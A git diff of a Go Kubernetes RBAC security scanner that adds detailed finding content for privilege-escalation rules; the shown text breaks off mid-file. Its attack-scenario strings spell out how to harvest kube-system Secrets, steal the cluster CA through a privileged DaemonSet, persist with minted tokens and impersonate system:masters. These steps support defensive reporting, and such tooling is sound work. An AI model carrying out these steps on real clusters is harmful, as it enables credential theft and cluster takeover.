+	steps = append(steps, "Final step: the attacker has `get secrets -n kube-system`. They list every Secret, decode each `data` value, and pull cloud IAM credentials, registry pull secrets, addon API keys, and SA tokens for cluster-admin-adjacent operators. Each of those is a separate privesc path, often shorter than the one that got them here.")
+	return ruleContent{
+		Title: fmt.Sprintf("`%s` can read **kube-system Secrets** in %d hop(s)", source.Key(), hopCount),
+		Scope: scopeForPath(source, models.TargetKubeSystemSecrets),
+		Description: fmt.Sprintf("Subject `%s` has a privesc path that terminates in `get/list/watch secrets` in `kube-system`. This is not full cluster-admin, but it is the most consequential namespace to read — `kube-system` Secrets typically contain the credentials that *unlock* cluster-admin: cloud IAM keys (cloud-controller-manager, EBS/PD/Disk CSI), registry pull secrets (system images), addon API keys, and tokens for SAs that are themselves bound to `cluster-admin` (operator installers, helm-controllers).\n\n"+
+			"The chain (%d hop(s); each step uses an explicit RBAC verb the engine validated):\n%s\n\n"+
+			"In production clusters this path is the single most common one in `kubesplaining`'s output — `secrets:get` is over-granted by Helm chart defaults, by stale `view`-style roles, and by ConfigMap-reader roles that wildcard `resources` to include Secrets. The path is short (often 1-2 hops) and exploitation is trivial: the attacker decodes base64 and is in.",
+			source.Key(), hopCount, formatHopList(hops)),
+		Impact:         "Reading kube-system Secrets typically yields cloud-account compromise, registry write (supply-chain implant), and tokens for cluster-admin-adjacent SAs — a one-way ratchet to full cluster control through subsequent privesc paths.",
+		AttackScenario: steps,
+		Remediation:    fmt.Sprintf("Eliminate the path by tightening `secrets:get` in `kube-system` to a narrow allowlist of system controllers, then break the chain at: %s.", hopsRemediation(hops)),
+		RemediationSteps: []string{
+			"List who can `get secrets -n kube-system`: `kubectl auth can-i get secrets -n kube-system --as=system:serviceaccount:<ns>:<sa>` for every workload SA, and `kubectl get rolebindings,clusterrolebindings -A -o yaml | grep -B5 secrets` to find broad grants.",
+			"Move kube-system Secrets that don't need to be live to External Secrets Operator (Vault/SecretsManager) so the in-cluster Secret becomes a generated artifact instead of source-of-truth.",
+			fmt.Sprintf("Break the chain at: %s.", hopsRemediation(hops)),
+			"For controllers that legitimately need a kube-system Secret read, scope the binding to that exact named Secret using `resourceNames`, not `resources: [secrets]`.",
+			"Wire admission policy: a Kyverno rule that fails any new RoleBinding/ClusterRoleBinding granting `secrets` verbs without `resourceNames` to non-system subjects.",
+		},
+		LearnMore: []models.Reference{
+			refHackTricksRBAC,
+			refRBACGoodPrac,
+			{Title: "External Secrets Operator", URL: "https://external-secrets.io/latest/"},
+			refMSThreatMatrix,
+			refNSAHardening,
+		},
+		MitreTechniques: []models.MitreTechnique{mitreT1552_007, mitreT1078_004, mitreT1098},
+	}
+}
+
+func contentSystemMastersPath(source models.SubjectRef, hops []models.EscalationHop) ruleContent {
+	hopCount := len(hops)
+	steps := make([]string, 0, hopCount+2)
+	steps = append(steps, fmt.Sprintf("Attacker compromises any workload bound to `%s`.", source.Key()))
+	for _, hop := range hops {
+		steps = append(steps, hopNarrative(hop))
+	}
+	steps = append(steps, "Final step: attacker can impersonate group `system:masters`. The kube-apiserver short-circuits authorization for `system:masters` via the static token / certificate path — bypassing every RBAC check. They are now indistinguishable from a kubeadm control-plane operator.")
+	return ruleContent{
+		Title: fmt.Sprintf("`%s` can impersonate **`system:masters`** in %d hop(s) — bypasses all RBAC", source.Key(), hopCount),
+		Scope: scopeForPath(source, models.TargetSystemMasters),
+		Description: fmt.Sprintf("Subject `%s` can chain into the ability to impersonate the `system:masters` group. `system:masters` is special: the kube-apiserver hard-codes it as authorized for *every* operation regardless of RBAC. There is no Role or ClusterRole that grants `system:masters` reach — it is a pre-RBAC carve-out for kubeadm control-plane operators (cert-based auth with `O=system:masters` skips authorization entirely).\n\n"+
+			"The chain (%d hop(s); each step is an RBAC verb the engine validated):\n%s\n\n"+
+			"Impersonation of `system:masters` is the rarest but most severe finding type. Most clusters do not give workload SAs `impersonate users/groups` because `system:masters` is the pathological consequence — a single `impersonate` grant on a workload SA is the entire chain. CIS Kubernetes 5.1.4 and the RBAC good-practices guide explicitly call out impersonation grants for review.",
+			source.Key(), hopCount, formatHopList(hops)),
+		Impact:         "Impersonating `system:masters` bypasses every RBAC check the cluster ever had. Every API call succeeds. Audit logs are written but the actor field shows the impersonated principal; attribution requires reading the `impersonate` audit annotation.",
+		AttackScenario: steps,
+		Remediation:    fmt.Sprintf("Remove every `impersonate` grant on a path to `system:masters`. Concretely: %s.", hopsRemediation(hops)),
+		RemediationSteps: []string{
+			"List subjects with impersonate: `kubectl get rolebindings,clusterrolebindings -A -o json | jq '.items[] | select(.subjects[]? | .kind == \"User\" or .kind == \"Group\" or .kind == \"ServiceAccount\") | .metadata.name + \" → \" + (.roleRef.name)'` then check each role's rules for `impersonate`.",
+			"Almost no production workload genuinely needs `impersonate users/groups`. Kubectl plugins/dashboards that *do* need it should use `kubectl --as=...` from a human admin's session, not a workload SA.",
+			fmt.Sprintf("Break the chain: %s.", hopsRemediation(hops)),
+			"For kubectl-as-a-service workloads, scope the impersonation with `resourceNames: [<allowed-user>]` to a fixed allowlist of principals — *never* `users: [*]` or `groups: [*]`.",
+			"Wire admission policy: a Kyverno rule that fails any RoleBinding granting `impersonate` to a non-system subject without an explicit `resourceNames` carve-out.",
+		},
+		LearnMore: []models.Reference{
+			refHackTricksRBAC,
+			refRBACGoodPrac,
+			refMSThreatMatrix,
+			refNSAHardening,
+		},
+		MitreTechniques: []models.MitreTechnique{mitreT1078_004, mitreT1098, mitreT1556, mitreT1068},
+	}
+}
+
+func contentGenericPath(source models.SubjectRef, target models.EscalationTarget, hops []models.EscalationHop) ruleContent {
+	hopCount := len(hops)
+	steps := make([]string, 0, hopCount+2)
+	steps = append(steps, fmt.Sprintf("Attacker compromises any workload bound to `%s`.", source.Key()))
+	for _, hop := range hops {
+		steps = append(steps, hopNarrative(hop))
+	}
+	steps = append(steps, fmt.Sprintf("Final step: attacker reaches `%s`.", target))
+	return ruleContent{
+		Title: fmt.Sprintf("`%s` can reach `%s` in %d hop(s)", source.Key(), target, hopCount),
+		Scope: scopeForPath(source, target),
+		Description: fmt.Sprintf("Subject `%s` has a multi-hop chain to `%s`. Each hop in the chain is an RBAC primitive the engine validated against the snapshot.\n\nThe chain:\n%s",
+			source.Key(), target, formatHopList(hops)),
+		Impact:         fmt.Sprintf("Compromise of `%s` chains to `%s` — investigate the specific privileges this sink represents in your cluster.", source.Key(), target),
+		AttackScenario: steps,
+		Remediation:    fmt.Sprintf("Break the chain at the weakest hop: %s.", hopsRemediation(hops)),
+		RemediationSteps: []string{
+			"Confirm each hop with `kubectl auth can-i`.",
+			fmt.Sprintf("Apply the cut: %s.", hopsRemediation(hops)),
+			"Re-run the scanner to confirm the path no longer resolves.",
+		},
+		LearnMore: []models.Reference{
+			refHackTricksRBAC,
+			refRBACGoodPrac,
+			refMSThreatMatrix,
+		},
+		MitreTechniques: []models.MitreTechnique{mitreT1078_004, mitreT1098, mitreT1068},
+	}
+}
+
+// formatHopList renders the chain as a numbered Markdown list embeddable in Description.
+func formatHopList(hops []models.EscalationHop) string {
+	if len(hops) == 0 {
+		return "  (no hops — direct membership)"
+	}
+	lines := make([]string, 0, len(hops))
+	for _, hop := range hops {
+		lines = append(lines, fmt.Sprintf("  %d. `%s` → `%s` via `%s` (%s) — %s", hop.Step, hop.FromSubject.Key(), hop.ToSubject.Key(), hop.Action, hop.Permission, hop.Gains))
+	}
+	return strings.Join(lines, "\n")
+}

--- a/internal/analyzer/rbac/analyzer.go
+++ b/internal/analyzer/rbac/analyzer.go
@@ -110,124 +110,52 @@ func (a *Analyzer) Analyze(_ context.Context, snapshot models.Snapshot) ([]model
 
 			switch {
 			case hasWildcard(rule.Verbs) && hasWildcard(rule.Resources) && hasWildcard(rule.APIGroups):
-				findings = appendFinding(findings, seen, finding(perms.Subject, rule, findingSpec{
-					RuleID:      "KUBE-PRIVESC-017",
-					Severity:    models.SeverityCritical,
-					Category:    models.CategoryPrivilegeEscalation,
-					BaseScore:   scoring.Clamp(9.8 * exploitability * blastRadius),
-					Title:       "Wildcard cluster-admin style permissions",
-					Description: "This subject can act on any resource with any verb, which is effectively cluster-admin access.",
-					Remediation: "Replace wildcard verbs/resources with the minimum set of explicit permissions required for the workload.",
-					References: []string{
-						"https://kubernetes.io/docs/reference/access-authn-authz/rbac/",
-					},
-				}))
+				findings = appendFinding(findings, seen, findingFromContent(perms.Subject, rule,
+					"KUBE-PRIVESC-017", models.SeverityCritical, models.CategoryPrivilegeEscalation,
+					scoring.Clamp(9.8*exploitability*blastRadius),
+					contentPrivesc017(rule.Namespace, perms.Subject, rule.SourceBinding, rule.SourceRole)))
 			case hasResource(rule.Resources, "secrets") && hasAnyVerb(rule.Verbs, "get", "list", "watch"):
-				findings = appendFinding(findings, seen, finding(perms.Subject, rule, findingSpec{
-					RuleID:      "KUBE-PRIVESC-005",
-					Severity:    models.SeverityHigh,
-					Category:    models.CategoryDataExfiltration,
-					BaseScore:   scoring.Clamp(8.2 * exploitability * blastRadius),
-					Title:       "Secret read access",
-					Description: "This subject can read Kubernetes secrets, which can expose service account tokens, credentials, and certificates.",
-					Remediation: "Restrict secret access to only the namespaces and workloads that require it.",
-					References: []string{
-						"https://kubernetes.io/docs/concepts/configuration/secret/",
-					},
-				}))
+				findings = appendFinding(findings, seen, findingFromContent(perms.Subject, rule,
+					"KUBE-PRIVESC-005", models.SeverityHigh, models.CategoryDataExfiltration,
+					scoring.Clamp(8.2*exploitability*blastRadius),
+					contentPrivesc005(rule.Namespace, perms.Subject, rule.SourceBinding, rule.SourceRole)))
 			case hasResource(rule.Resources, "pods") && hasAnyVerb(rule.Verbs, "create"):
-				findings = appendFinding(findings, seen, finding(perms.Subject, rule, findingSpec{
-					RuleID:      "KUBE-PRIVESC-001",
-					Severity:    models.SeverityHigh,
-					Category:    models.CategoryPrivilegeEscalation,
-					BaseScore:   scoring.Clamp(8.4 * exploitability * blastRadius),
-					Title:       "Pod creation access can be used for token theft",
-					Description: "Creating pods lets an attacker mount another service account and execute code with that identity.",
-					Remediation: "Remove direct pod creation rights from broad identities and route deployments through controlled automation.",
-					References: []string{
-						"https://kubernetes.io/docs/reference/access-authn-authz/rbac/",
-					},
-				}))
+				findings = appendFinding(findings, seen, findingFromContent(perms.Subject, rule,
+					"KUBE-PRIVESC-001", models.SeverityHigh, models.CategoryPrivilegeEscalation,
+					scoring.Clamp(8.4*exploitability*blastRadius),
+					contentPrivesc001(rule.Namespace, perms.Subject, rule.SourceBinding, rule.SourceRole)))
 			case hasAnyResource(rule.Resources, []string{"deployments", "daemonsets", "statefulsets", "jobs", "cronjobs"}) &&
 				hasAnyVerb(rule.Verbs, "create", "update", "patch"):
-				findings = appendFinding(findings, seen, finding(perms.Subject, rule, findingSpec{
-					RuleID:      "KUBE-PRIVESC-003",
-					Severity:    models.SeverityHigh,
-					Category:    models.CategoryPrivilegeEscalation,
-					BaseScore:   scoring.Clamp(8.1 * exploitability * blastRadius),
-					Title:       "Workload controller modification can create privileged pods",
-					Description: "This subject can create or mutate workload controllers that in turn create pods.",
-					Remediation: "Restrict workload mutation rights and separate deployment automation from runtime identities.",
-					References: []string{
-						"https://cloud.hacktricks.wiki/en/pentesting-cloud/kubernetes-security/abusing-roles-clusterroles-in-kubernetes/index.html",
-					},
-				}))
+				findings = appendFinding(findings, seen, findingFromContent(perms.Subject, rule,
+					"KUBE-PRIVESC-003", models.SeverityHigh, models.CategoryPrivilegeEscalation,
+					scoring.Clamp(8.1*exploitability*blastRadius),
+					contentPrivesc003(rule.Namespace, perms.Subject, rule.SourceBinding, rule.SourceRole)))
 			case hasAnyResource(rule.Resources, []string{"users", "groups", "serviceaccounts"}) && hasAnyVerb(rule.Verbs, "impersonate"):
-				findings = appendFinding(findings, seen, finding(perms.Subject, rule, findingSpec{
-					RuleID:      "KUBE-PRIVESC-008",
-					Severity:    models.SeverityCritical,
-					Category:    models.CategoryPrivilegeEscalation,
-					BaseScore:   scoring.Clamp(9.4 * exploitability * blastRadius),
-					Title:       "Impersonation permissions",
-					Description: "This subject can impersonate other identities and potentially assume more privileged access.",
-					Remediation: "Avoid granting impersonation except to tightly controlled admin workflows.",
-					References: []string{
-						"https://kubernetes.io/docs/reference/access-authn-authz/authentication/#user-impersonation",
-					},
-				}))
+				findings = appendFinding(findings, seen, findingFromContent(perms.Subject, rule,
+					"KUBE-PRIVESC-008", models.SeverityCritical, models.CategoryPrivilegeEscalation,
+					scoring.Clamp(9.4*exploitability*blastRadius),
+					contentPrivesc008(rule.Namespace, perms.Subject, rule.SourceBinding, rule.SourceRole)))
 			case hasAnyResource(rule.Resources, []string{"roles", "clusterroles"}) && hasAnyVerb(rule.Verbs, "bind", "escalate"):
-				findings = appendFinding(findings, seen, finding(perms.Subject, rule, findingSpec{
-					RuleID:      "KUBE-PRIVESC-009",
-					Severity:    models.SeverityCritical,
-					Category:    models.CategoryPrivilegeEscalation,
-					BaseScore:   scoring.Clamp(9.2 * exploitability * blastRadius),
-					Title:       "RBAC bind or escalate permission",
-					Description: "This subject can bypass RBAC escalation protections or bind itself to higher privileges.",
-					Remediation: "Remove `bind` and `escalate` from non-admin identities and scope RBAC write access tightly.",
-					References: []string{
-						"https://kubernetes.io/docs/reference/access-authn-authz/rbac/#restrictions-on-role-binding-creation-or-update",
-					},
-				}))
+				findings = appendFinding(findings, seen, findingFromContent(perms.Subject, rule,
+					"KUBE-PRIVESC-009", models.SeverityCritical, models.CategoryPrivilegeEscalation,
+					scoring.Clamp(9.2*exploitability*blastRadius),
+					contentPrivesc009(rule.Namespace, perms.Subject, rule.SourceBinding, rule.SourceRole)))
 			case hasAnyResource(rule.Resources, []string{"rolebindings", "clusterrolebindings"}) &&
 				hasAnyVerb(rule.Verbs, "create", "update", "patch"):
-				findings = appendFinding(findings, seen, finding(perms.Subject, rule, findingSpec{
-					RuleID:      "KUBE-PRIVESC-010",
-					Severity:    models.SeverityCritical,
-					Category:    models.CategoryPrivilegeEscalation,
-					BaseScore:   scoring.Clamp(9.0 * exploitability * blastRadius),
-					Title:       "Role binding modification can self-grant access",
-					Description: "This subject can create or modify role bindings and may grant itself stronger permissions.",
-					Remediation: "Limit RBAC binding write access to a small administrative boundary and monitor changes.",
-					References: []string{
-						"https://kubernetes.io/docs/reference/access-authn-authz/rbac/",
-					},
-				}))
+				findings = appendFinding(findings, seen, findingFromContent(perms.Subject, rule,
+					"KUBE-PRIVESC-010", models.SeverityCritical, models.CategoryPrivilegeEscalation,
+					scoring.Clamp(9.0*exploitability*blastRadius),
+					contentPrivesc010(rule.Namespace, perms.Subject, rule.SourceBinding, rule.SourceRole)))
 			case hasResource(rule.Resources, "nodes/proxy") && hasAnyVerb(rule.Verbs, "get"):
-				findings = appendFinding(findings, seen, finding(perms.Subject, rule, findingSpec{
-					RuleID:      "KUBE-PRIVESC-012",
-					Severity:    models.SeverityCritical,
-					Category:    models.CategoryPrivilegeEscalation,
-					BaseScore:   scoring.Clamp(9.3 * exploitability * blastRadius),
-					Title:       "Node proxy access",
-					Description: "Access to `nodes/proxy` can enable kubelet abuse and command execution into pods on the node.",
-					Remediation: "Avoid granting kubelet-facing permissions to application identities.",
-					References: []string{
-						"https://cloud.hacktricks.wiki/en/pentesting-cloud/kubernetes-security/abusing-roles-clusterroles-in-kubernetes/index.html",
-					},
-				}))
+				findings = appendFinding(findings, seen, findingFromContent(perms.Subject, rule,
+					"KUBE-PRIVESC-012", models.SeverityCritical, models.CategoryPrivilegeEscalation,
+					scoring.Clamp(9.3*exploitability*blastRadius),
+					contentPrivesc012(rule.Namespace, perms.Subject, rule.SourceBinding, rule.SourceRole)))
 			case hasResource(rule.Resources, "serviceaccounts/token") && hasAnyVerb(rule.Verbs, "create"):
-				findings = appendFinding(findings, seen, finding(perms.Subject, rule, findingSpec{
-					RuleID:      "KUBE-PRIVESC-014",
-					Severity:    models.SeverityHigh,
-					Category:    models.CategoryPrivilegeEscalation,
-					BaseScore:   scoring.Clamp(8.0 * exploitability * blastRadius),
-					Title:       "Service account token creation",
-					Description: "This subject can mint service account tokens for other identities in scope.",
-					Remediation: "Grant `create` on `serviceaccounts/token` only to trusted control-plane components.",
-					References: []string{
-						"https://kubernetes.io/docs/reference/access-authn-authz/service-accounts-admin/",
-					},
-				}))
+				findings = appendFinding(findings, seen, findingFromContent(perms.Subject, rule,
+					"KUBE-PRIVESC-014", models.SeverityHigh, models.CategoryPrivilegeEscalation,
+					scoring.Clamp(8.0*exploitability*blastRadius),
+					contentPrivesc014(rule.Namespace, perms.Subject, rule.SourceBinding, rule.SourceRole)))
 			}
 		}
 	}
@@ -239,36 +167,16 @@ func (a *Analyzer) Analyze(_ context.Context, snapshot models.Snapshot) ([]model
 				if strings.HasPrefix(ref.Name, "system:") {
 					continue
 				}
-				findings = appendFinding(findings, seen, finding(ref, effectiveRule{SourceBinding: binding.Name, SourceRole: binding.RoleRef.Name}, findingSpec{
-					RuleID:      "KUBE-RBAC-OVERBROAD-001",
-					Severity:    models.SeverityCritical,
-					Category:    models.CategoryPrivilegeEscalation,
-					BaseScore:   10,
-					Title:       "Non-system subject bound to cluster-admin",
-					Description: "A non-system subject is directly bound to the `cluster-admin` ClusterRole.",
-					Remediation: "Replace cluster-admin with a custom least-privilege role or constrain the binding to a dedicated admin group.",
-					References: []string{
-						"https://kubernetes.io/docs/reference/access-authn-authz/rbac/#user-facing-roles",
-					},
-				}))
+				findings = appendFinding(findings, seen, findingFromContent(
+					ref,
+					effectiveRule{SourceBinding: binding.Name, SourceRole: binding.RoleRef.Name},
+					"KUBE-RBAC-OVERBROAD-001", models.SeverityCritical, models.CategoryPrivilegeEscalation, 10,
+					contentRBACOverbroad001(ref, binding.Name)))
 			}
 		}
 	}
 
 	return findings, nil
-}
-
-// findingSpec bundles the static metadata used to materialize a models.Finding for a matched rule.
-type findingSpec struct {
-	RuleID      string
-	Severity    models.Severity
-	Category    models.RiskCategory
-	BaseScore   float64
-	Title       string
-	Description string
-	Remediation string
-	References  []string
-	Tags        []string
 }
 
 // appendFinding adds finding to the slice unless its ID has already been seen (deduplication keyed by Finding.ID).
@@ -280,8 +188,11 @@ func appendFinding(findings []models.Finding, seen map[string]struct{}, finding 
 	return append(findings, finding)
 }
 
-// finding materializes a models.Finding describing subject's exposure through rule using spec's metadata.
-func finding(subject models.SubjectRef, rule effectiveRule, spec findingSpec) models.Finding {
+// findingFromContent materializes a models.Finding using the enriched ruleContent (Scope, Impact,
+// AttackScenario, RemediationSteps, LearnMore, MitreTechniques) plus the runtime context (subject,
+// originating rule, severity/score/category bucket). Evidence keeps the same shape as before so
+// existing consumers continue to work.
+func findingFromContent(subject models.SubjectRef, rule effectiveRule, ruleID string, severity models.Severity, category models.RiskCategory, score float64, content ruleContent) models.Finding {
 	evidenceBytes, _ := json.Marshal(map[string]any{
 		"source_role":    rule.SourceRole,
 		"source_binding": rule.SourceBinding,
@@ -289,6 +200,7 @@ func finding(subject models.SubjectRef, rule effectiveRule, spec findingSpec) mo
 		"resources":      rule.Resources,
 		"verbs":          rule.Verbs,
 		"namespace":      rule.Namespace,
+		"scope":          string(content.Scope.Level),
 	})
 
 	resource := &models.ResourceRef{
@@ -298,22 +210,32 @@ func finding(subject models.SubjectRef, rule effectiveRule, spec findingSpec) mo
 		APIGroup:  "rbac.authorization.k8s.io",
 	}
 
-	id := fmt.Sprintf("%s:%s:%s:%s", spec.RuleID, subject.Key(), rule.Namespace, strings.Join(rule.Resources, ","))
+	id := fmt.Sprintf("%s:%s:%s:%s", ruleID, subject.Key(), rule.Namespace, strings.Join(rule.Resources, ","))
+	references := make([]string, 0, len(content.LearnMore))
+	for _, ref := range content.LearnMore {
+		references = append(references, ref.URL)
+	}
 	return models.Finding{
-		ID:          id,
-		RuleID:      spec.RuleID,
-		Severity:    spec.Severity,
-		Score:       spec.BaseScore,
-		Category:    spec.Category,
-		Title:       spec.Title,
-		Description: spec.Description,
-		Subject:     &subject,
-		Resource:    resource,
-		Namespace:   rule.Namespace,
-		Evidence:    evidenceBytes,
-		Remediation: spec.Remediation,
-		References:  spec.References,
-		Tags:        append([]string{"module:rbac"}, spec.Tags...),
+		ID:               id,
+		RuleID:           ruleID,
+		Severity:         severity,
+		Score:            score,
+		Category:         category,
+		Title:            content.Title,
+		Description:      content.Description,
+		Subject:          &subject,
+		Resource:         resource,
+		Namespace:        rule.Namespace,
+		Scope:            content.Scope,
+		Impact:           content.Impact,
+		AttackScenario:   content.AttackScenario,
+		Evidence:         evidenceBytes,
+		Remediation:      content.Remediation,
+		RemediationSteps: content.RemediationSteps,
+		References:       references,
+		LearnMore:        content.LearnMore,
+		MitreTechniques:  content.MitreTechniques,
+		Tags:             []string{"module:rbac"},
 	}
 }
 

--- a/internal/analyzer/rbac/content.go
+++ b/internal/analyzer/rbac/content.go
@@ -1,0 +1,544 @@
+// Content for RBAC findings. Each rule has a builder that takes runtime context
+// (namespace, subject, source role/binding) and returns an enriched ruleContent
+// with scope-aware language, an attacker walkthrough, ordered remediation steps,
+// and structured references / MITRE technique citations.
+//
+// Sources for the content below: Kubernetes RBAC Good Practices, NSA/CISA Kubernetes
+// Hardening Guide v1.2, MITRE ATT&CK Containers matrix, Microsoft Threat Matrix for
+// Kubernetes, kubernetes/kubernetes#119640 (nodes/proxy escalation), Datadog Security
+// Labs (TokenRequest persistence), Aqua Security and SCHUTZWERK RBAC writeups.
+package rbac
+
+import (
+	"fmt"
+
+	"github.com/hardik/kubesplaining/internal/models"
+)
+
+// ruleContent bundles every enriched field a rule emits beyond Title/Description.
+type ruleContent struct {
+	Title            string
+	Scope            models.Scope
+	Description      string
+	Impact           string
+	AttackScenario   []string
+	Remediation      string
+	RemediationSteps []string
+	LearnMore        []models.Reference
+	MitreTechniques  []models.MitreTechnique
+}
+
+// scopeForRule renders the Scope a finding inherits from its source rule. Cluster-wide
+// when the originating binding is a ClusterRoleBinding (rule.Namespace == "") and namespace-scoped
+// otherwise. The Detail string is what the report shows in the scope chip and CSV.
+func scopeForRule(ruleNamespace string) models.Scope {
+	if ruleNamespace == "" {
+		return models.Scope{
+			Level:  models.ScopeCluster,
+			Detail: "Cluster-wide — applies to every current and future namespace",
+		}
+	}
+	return models.Scope{
+		Level:  models.ScopeNamespace,
+		Detail: fmt.Sprintf("Namespace `%s` only", ruleNamespace),
+	}
+}
+
+// scopePhrase is the short prefix used in titles, e.g. "Cluster-wide" or "Namespace `prod`".
+func scopePhrase(s models.Scope) string {
+	if s.Level == models.ScopeCluster {
+		return "Cluster-wide"
+	}
+	if s.Detail != "" {
+		return s.Detail
+	}
+	return "Namespace-scoped"
+}
+
+// subjectKey is a short helper so analyzer call-sites stay readable.
+func subjectKey(subject models.SubjectRef) string {
+	return subject.Key()
+}
+
+// kubectlAuthCanI returns the verification command tailored to scope.
+func kubectlAuthCanI(verb, resource string, ruleNamespace string, subject models.SubjectRef) string {
+	scope := "-A"
+	if ruleNamespace != "" {
+		scope = fmt.Sprintf("-n %s", ruleNamespace)
+	}
+	return fmt.Sprintf("kubectl auth can-i %s %s --as=%s %s", verb, resource, subject.Name, scope)
+}
+
+// References used across most rules — collected once so each rule's LearnMore stays focused.
+var (
+	refRBACGoodPractices = models.Reference{
+		Title: "Kubernetes — RBAC Good Practices",
+		URL:   "https://kubernetes.io/docs/concepts/security/rbac-good-practices/",
+	}
+	refRBACDocs = models.Reference{
+		Title: "Kubernetes — Using RBAC Authorization",
+		URL:   "https://kubernetes.io/docs/reference/access-authn-authz/rbac/",
+	}
+	refNSAHardening = models.Reference{
+		Title: "NSA/CISA Kubernetes Hardening Guide v1.2 (PDF)",
+		URL:   "https://media.defense.gov/2022/Aug/29/2003066362/-1/-1/0/CTR_KUBERNETES_HARDENING_GUIDANCE_1.2_20220829.PDF",
+	}
+	refCISBenchmark = models.Reference{
+		Title: "CIS Kubernetes Benchmark (RBAC controls)",
+		URL:   "https://www.cisecurity.org/benchmark/kubernetes",
+	}
+	refMSThreatMatrix = models.Reference{
+		Title: "Microsoft Threat Matrix for Kubernetes",
+		URL:   "https://microsoft.github.io/Threat-Matrix-for-Kubernetes/",
+	}
+)
+
+// MITRE ATT&CK helpers (Containers matrix). These objects are reused across rules.
+var (
+	mitreT1078 = models.MitreTechnique{
+		ID:   "T1078",
+		Name: "Valid Accounts",
+		URL:  "https://attack.mitre.org/techniques/T1078/",
+	}
+	mitreT1078_004 = models.MitreTechnique{
+		ID:   "T1078.004",
+		Name: "Valid Accounts: Cloud Accounts",
+		URL:  "https://attack.mitre.org/techniques/T1078/004/",
+	}
+	mitreT1098 = models.MitreTechnique{
+		ID:   "T1098",
+		Name: "Account Manipulation",
+		URL:  "https://attack.mitre.org/techniques/T1098/",
+	}
+	mitreT1098_001 = models.MitreTechnique{
+		ID:   "T1098.001",
+		Name: "Account Manipulation: Additional Cloud Credentials",
+		URL:  "https://attack.mitre.org/techniques/T1098/001/",
+	}
+	mitreT1134 = models.MitreTechnique{
+		ID:   "T1134",
+		Name: "Access Token Manipulation",
+		URL:  "https://attack.mitre.org/techniques/T1134/",
+	}
+	mitreT1528 = models.MitreTechnique{
+		ID:   "T1528",
+		Name: "Steal Application Access Token",
+		URL:  "https://attack.mitre.org/techniques/T1528/",
+	}
+	mitreT1548 = models.MitreTechnique{
+		ID:   "T1548",
+		Name: "Abuse Elevation Control Mechanism",
+		URL:  "https://attack.mitre.org/techniques/T1548/",
+	}
+	mitreT1550 = models.MitreTechnique{
+		ID:   "T1550",
+		Name: "Use Alternate Authentication Material",
+		URL:  "https://attack.mitre.org/techniques/T1550/",
+	}
+	mitreT1552_007 = models.MitreTechnique{
+		ID:   "T1552.007",
+		Name: "Unsecured Credentials: Container API",
+		URL:  "https://attack.mitre.org/techniques/T1552/007/",
+	}
+	mitreT1609 = models.MitreTechnique{
+		ID:   "T1609",
+		Name: "Container Administration Command",
+		URL:  "https://attack.mitre.org/techniques/T1609/",
+	}
+	mitreT1610 = models.MitreTechnique{
+		ID:   "T1610",
+		Name: "Deploy Container",
+		URL:  "https://attack.mitre.org/techniques/T1610/",
+	}
+	mitreT1611 = models.MitreTechnique{
+		ID:   "T1611",
+		Name: "Escape to Host",
+		URL:  "https://attack.mitre.org/techniques/T1611/",
+	}
+	mitreT1613 = models.MitreTechnique{
+		ID:   "T1613",
+		Name: "Container and Resource Discovery",
+		URL:  "https://attack.mitre.org/techniques/T1613/",
+	}
+)
+
+// contentPrivesc017 — Wildcard verbs/resources/apiGroups (KUBE-PRIVESC-017).
+func contentPrivesc017(ruleNamespace string, subject models.SubjectRef, sourceBinding, sourceRole string) ruleContent {
+	scope := scopeForRule(ruleNamespace)
+	phrase := scopePhrase(scope)
+	return ruleContent{
+		Title: fmt.Sprintf("%s wildcard RBAC permissions on %s", phrase, subjectKey(subject)),
+		Scope: scope,
+		Description: fmt.Sprintf("RBAC rule binding `%s` → role `%s` grants `*` verbs on `*` resources in `*` apiGroups to %s. %s.\n\n"+
+			"Wildcards are dangerous beyond their current expansion: any resource type added later (CRDs, new core subresources, future verbs) is automatically granted to this subject without anyone reviewing the change. The Kubernetes project explicitly flags this in `RBAC Good Practices` as an anti-pattern.\n\n"+
+			"In a typical attack, an adversary who reaches a workload bound to this rule has full control: they read every Secret, create privileged pods on any node, bind themselves to additional ClusterRoles, and persist by minting long-lived tokens via the TokenRequest API. There is no further escalation needed — the box is already at the top.",
+			sourceBinding, sourceRole, subjectKey(subject), scope.Detail),
+		Impact: fmt.Sprintf("Full control over %s — read/write every Secret, RBAC, Pod, Node; equivalent to `cluster-admin` when cluster-scoped.", phrase),
+		AttackScenario: []string{
+			fmt.Sprintf("Attacker compromises a workload that resolves to %s — vulnerable container image, supply-chain backdoor, or stolen kubeconfig.", subjectKey(subject)),
+			fmt.Sprintf("They run `%s` and confirm wildcard permissions.", kubectlAuthCanI("'*'", "'*'", ruleNamespace, subject)),
+			"They list every Secret in scope (`kubectl get secrets -A -o yaml`) to harvest cloud-provider credentials, registry pull secrets, and other ServiceAccount tokens.",
+			"They create a privileged DaemonSet that mounts the host filesystem and reads `/etc/kubernetes/pki/*` to steal the cluster CA.",
+			"They establish persistence by minting a long-lived token for `clusterrole-aggregation-controller` via the TokenRequest API, then optionally remove their original binding to evade detection.",
+		},
+		Remediation: "Replace the wildcard rule with an explicit allowlist of (apiGroups, resources, verbs) limited to what the workload actually calls.",
+		RemediationSteps: []string{
+			fmt.Sprintf("Inventory what %s actually needs — run `%s` and correlate with audit logs filtered on `user.username`.", subjectKey(subject), kubectlAuthCanI("--list", "", ruleNamespace, subject)),
+			"Author a least-privilege Role/ClusterRole listing only those (apiGroups, resources, verbs); drop every wildcard. Prefer namespace-scoped Role+RoleBinding over ClusterRole+ClusterRoleBinding wherever possible.",
+			fmt.Sprintf("Apply the new binding, delete the wildcard binding `%s`, and verify with `%s` returning `no`.", sourceBinding, kubectlAuthCanI("'*'", "'*'", ruleNamespace, subject)),
+			"Add a ValidatingAdmissionPolicy (or Kyverno/OPA Gatekeeper rule) that rejects any future Role/ClusterRole containing `*` in verbs, resources, or apiGroups.",
+		},
+		LearnMore: []models.Reference{
+			refRBACGoodPractices,
+			refRBACDocs,
+			refNSAHardening,
+			{Title: "Microsoft Threat Matrix for Kubernetes — Privilege Escalation", URL: "https://microsoft.github.io/Threat-Matrix-for-Kubernetes/tactics/PrivilegeEscalation/"},
+			{Title: "Unit 42 — Mitigating RBAC-Based Privilege Escalation", URL: "https://unit42.paloaltonetworks.com/kubernetes-privilege-escalation/"},
+		},
+		MitreTechniques: []models.MitreTechnique{mitreT1078, mitreT1078_004, mitreT1610, mitreT1613, mitreT1098},
+	}
+}
+
+// contentPrivesc005 — Secret read access (KUBE-PRIVESC-005).
